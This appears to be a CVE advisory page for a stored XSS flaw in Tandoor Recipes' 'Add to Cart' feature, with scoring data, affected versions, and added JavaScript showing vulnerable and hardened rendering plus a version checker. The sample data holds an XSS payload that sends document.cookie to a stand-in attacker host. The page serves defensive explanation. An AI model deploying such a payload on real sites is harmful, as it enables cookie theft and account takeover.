CVE-2022-23072

Published: 2022-06-21 08:15:07
Weakness: CWE-79
Source: web.nvd.nist.gov
Tags: cve-2022-23072, recipes, xss, stored xss, add to cart, security vulnerability

CVSS2 base score: 3.5 (Low)

Attack Vector: NETWORK
Attack Complexity: MEDIUM
Authentication: SINGLE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
Vector string: AV:N/AC:M/Au:S/C:N/I:P/A:N

EPSS score: 0.0004 (Low), percentile 13.0%

In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to stored cross-site scripting (XSS) in the "Add to Cart" functionality. A Food whose 'Name' parameter contains a malicious JavaScript payload is stored and later rendered without adequate output encoding: when a victim opens the food list page and clicks the Add to Shopping Cart icon for that Food, the payload executes in the victim's browser. A low-privileged attacker who stores such a Food can thereby obtain the victim's API key, which can lead to takeover of an administrator's account.
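The rendering defect behind a stored XSS of this kind, as an added illustration written for this page (it is not Tandoor Recipes' own front-end code): a confirmation toast that interpolates the stored Food name into HTML, beside a form that encodes it and a DOM-building form that never parses it. The food objects, the payload string, the toast markup and the function names are constructed for the example; the advisory does not publish the payload that was used.

```javascript
// Added example for this page; not Tandoor Recipes' code. Models the pattern
// behind a stored XSS in an "added to shopping list" confirmation: the Food
// name is attacker-controlled data already accepted and stored by the server,
// and the defect is rendering it as HTML instead of as text.

// Constructed sample data (illustrative payload, not the one from the advisory).
const MALICIOUS_FOOD = {
  id: 42,
  name: '<img src=x onerror="fetch(\'https://attacker.example/?k=\'+document.cookie)">',
};
const BENIGN_FOOD = { id: 7, name: 'Tomato & Basil' };

// Vulnerable: string-built markup. Whatever assigns this to innerHTML or a
// v-html binding parses the name as HTML and runs the onerror handler.
function renderCartToastUnsafe(food) {
  return `<div class="toast">Added <b>${food.name}</b> to the shopping list</div>`;
}

// Encode the characters that are significant in HTML text and in
// double- or single-quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened: same template, but the name is encoded for the HTML text context
// before interpolation, so a browser shows the literal characters.
function renderCartToastSafe(food) {
  return `<div class="toast">Added <b>${escapeHtml(food.name)}</b> to the shopping list</div>`;
}

// Preferred in browser code: build nodes and set textContent, which never
// parses markup. Takes the Document as a parameter so it can be unit-tested
// against a DOM implementation; it is not exercised outside a browser here.
function renderCartToastDom(doc, food) {
  const div = doc.createElement('div');
  div.className = 'toast';
  const b = doc.createElement('b');
  b.textContent = food.name;
  div.append('Added ', b, ' to the shopping list');
  return div;
}

// Review aid: does a rendered toast contain any element other than the
// template's own <div> and <b>? True means user data reached the HTML parser.
function leaksMarkup(html) {
  const tags = html.match(/<\/?([a-zA-Z][a-zA-Z0-9-]*)/g) || [];
  return tags.some((t) => !/^<\/?(div|b)$/.test(t));
}
```

The DOM variant is the one to prefer in client code: building nodes and assigning textContent never hands the name to the HTML parser, so there is no per-context escaper to keep correct. Where a framework template is in use, the equivalent is to bind the name with ordinary text interpolation rather than a raw-HTML directive.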

Affected configurations

NVD
Node: tandoor recipes, range 1.0.5 to 1.2.5

CPE: tandoor:recipes
Name: tandoor recipes
Operator: le (less than or equal)
Version: 1.2.5

CNA Affected

[
  {
    "product": "recipes",
    "vendor": "recipes",
    "versions": [
      {
        "lessThan": "unspecified",
        "status": "affected",
        "version": "1.0.5",
        "versionType": "custom"
      },
      {
        "lessThanOrEqual": "1.2.5",
        "status": "affected",
        "version": "unspecified",
        "versionType": "custom"
      }
    ]
  }
]
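A check a practitioner wants from the affected-version data above, as an added example written for this page (not the CNA's or NVD's tooling): parse a "MAJOR.MINOR.PATCH" Recipes version string and decide whether it falls in the affected range. The two CNA records express the lower bound (from 1.0.5) and the upper bound (through 1.2.5) separately; the NVD configuration states the same as one range, 1.0.5 <= v <= 1.2.5, and that is the interpretation implemented here. The function names are the example's own, and the record array is copied from the CNA data shown on this page.

```javascript
// Added example for this page; not the CNA's or NVD's tooling. Decides whether
// an installed Recipes version is inside the affected range 1.0.5 <= v <= 1.2.5.
// Assumption: the two CNA records above are the lower and upper bound of one
// range, which is what the NVD configuration (tandoor:recipes, le 1.2.5,
// from 1.0.5) states.

// Parse "MAJOR.MINOR.PATCH" (optionally "v"-prefixed; a suffix such as
// "-beta" is ignored and compared on the base version) into three integers.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return m.slice(1, 4).map(Number);
}

// Numeric, field-by-field comparison: -1, 0 or 1. A string compare would
// put 1.10.0 before 1.2.5, which is the classic mistake here.
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// Build a single range from a CVE JSON 5.0-style "versions" array. A record
// with a concrete "version" sets the lower bound; "lessThanOrEqual" sets an
// inclusive upper bound and "lessThan" an exclusive one. "unspecified" is
// treated as absent.
function rangeFromCna(versions) {
  const range = { from: null, through: null, before: null };
  const set = (v) => (v && v !== 'unspecified' ? v : null);
  for (const rec of versions) {
    if (rec.status !== 'affected') continue;
    range.from = set(rec.version) || range.from;
    range.through = set(rec.lessThanOrEqual) || range.through;
    range.before = set(rec.lessThan) || range.before;
  }
  if (!range.from || !(range.through || range.before)) {
    throw new Error('affected range is not fully specified');
  }
  return range;
}

// Copied from the CNA records shown on this page.
const CNA_VERSIONS = [
  { lessThan: 'unspecified', status: 'affected', version: '1.0.5', versionType: 'custom' },
  { lessThanOrEqual: '1.2.5', status: 'affected', version: 'unspecified', versionType: 'custom' },
];
const AFFECTED_RANGE = rangeFromCna(CNA_VERSIONS);

// True when the installed version lies inside the range (inclusive lower
// bound; upper bound inclusive for "through", exclusive for "before").
function isAffected(installed, range = AFFECTED_RANGE) {
  if (compareVersions(installed, range.from) < 0) return false;
  if (range.through !== null) return compareVersions(installed, range.through) <= 0;
  return compareVersions(installed, range.before) < 0;
}
```

Run against a deployment, the only input needed is the version string the instance reports; anything that fails to parse (a branch name, "latest") is rejected rather than silently treated as unaffected.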
